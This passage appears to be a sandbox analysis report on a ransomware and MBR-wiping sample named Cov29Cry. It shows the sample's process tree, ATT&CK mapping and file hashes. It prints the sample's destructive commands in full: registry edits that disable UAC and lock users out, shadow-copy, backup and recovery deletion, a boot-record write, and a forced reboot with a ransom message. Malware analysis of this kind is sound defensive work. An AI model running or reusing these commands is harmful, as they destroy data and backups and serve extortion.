C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5860
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5876
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5892
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5908
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5924
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5940
-
-
C:\Users\Admin\AppData\Local\Temp\C033.tmp\mbr.exembr.exe3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:5968
-
-
C:\Users\Admin\AppData\Local\Temp\C033.tmp\Cov29Cry.exeCov29Cry.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5996 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵PID:5556
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:5700
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵PID:6008
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
PID:6024
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵PID:2792
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
PID:1184
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt5⤵PID:2364
-
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6024
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 93⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5252
-
-
C:\Users\Admin\AppData\Local\Temp\C033.tmp\Cov29LockScreen.exeCov29LockScreen.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:304
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5732
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4184
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:5320
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
3Modify Registry
3Pre-OS Boot
1Bootkit
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Query Registry
4Remote System Discovery
1System Information Discovery
4System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5dc058ebc0f8181946a312f0be99ed79c
SHA10c6f376ed8f2d4c275336048c7c9ef9edf18bff0
SHA256378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a
SHA51236e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa
-
Filesize
152B
MD5a0486d6f8406d852dd805b66ff467692
SHA177ba1f63142e86b21c951b808f4bc5d8ed89b571
SHA256c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be
SHA512065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a
-
Filesize
261B
MD52c2e6472d05e3832905f0ad4a04d21c3
SHA1007edbf35759af62a5b847ab09055e7d9b86ffcc
SHA256283d954fa21caa1f3b4aba941b154fab3e626ff27e7b8029f5357872c48cbe03
SHA5128c4ce1ea02da6ffb7e7041c50528da447d087d9ee3c9f4a8c525d2d856cf48e46f5dd9a1fedd23dd047634e719c8886457f7e7240aa3cc36f1a6216e4c00ee37
-
Filesize
6KB
MD51d5514bc9bd5089688381a7d1f7b1df2
SHA1d33968720c3118a8d9cac4150b917524e2a58bb4
SHA2569104385aaba41347da7fa0c2af0b219a52b7bae7c2f3ef2c8c42a0ebc55eff15
SHA5123eded7ceadf19cecc1337fd1a936a737f0d2c08333c917e4c98ea3cc3d95aacb2822726f4c64218b403005d6ac45b115937967e594eb06f77161da239c8f65f7
-
Filesize
6KB
MD561406e6fb56a6e660efd2399325a2952
SHA12a81e2fb7bfe7c68d538fa3baf0437df207cfffd
SHA25614c54582681abd9e427ceccb5662d5fedc0c07a5e6936a34e1c5facad79d3d41
SHA5127c5e5a41779fa6c5d46f2a36d545c4de566e08ae970892ee8d0ca0948f1a03f002bd8293c143b7d938cd24f8fcf4309704fee4142f962faa97a88592dd816335
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5356364bda6d670a550a889e816f261af
SHA11b5fcd2beab7f2c2d33a9e1935589bc889d936c4
SHA25632cfa015f7a9d8ffcbaa6141829fea48921b0645727137b3d1d79622071ec054
SHA5121715b896def197fef04ef937d6e0f3aa9f39495052a49d93257a163042e7cbeaaef80b971a8a0dd2d542468499d82ee6f80726a60933bbd0cec67a770c18bcdc
-
Filesize
103KB
MD58bcd083e16af6c15e14520d5a0bd7e6a
SHA1c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA51235999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a
-
Filesize
48KB
MD5f724c6da46dc54e6737db821f9b62d77
SHA1e35d5587326c61f4d7abd75f2f0fc1251b961977
SHA2566cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c
SHA5126f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc
-
Filesize
1KB
MD557f0432c8e31d4ff4da7962db27ef4e8
SHA1d5023b3123c0b7fae683588ac0480cd2731a0c5e
SHA256b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc
SHA512bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf
-
Filesize
144B
MD5c0437fe3a53e181c5e904f2d13431718
SHA144f9547e7259a7fb4fe718e42e499371aa188ab6
SHA256f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22
SHA512a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3
-
Filesize
1.3MB
MD535af6068d91ba1cc6ce21b461f242f94
SHA1cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA2569ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169
-
Filesize
861B
MD5c53dee51c26d1d759667c25918d3ed10
SHA1da194c2de15b232811ba9d43a46194d9729507f0
SHA256dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52
SHA512da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c
-
Filesize
1.7MB
MD5272d3e458250acd2ea839eb24b427ce5
SHA1fae7194da5c969f2d8220ed9250aa1de7bf56609
SHA256bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3
SHA512d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c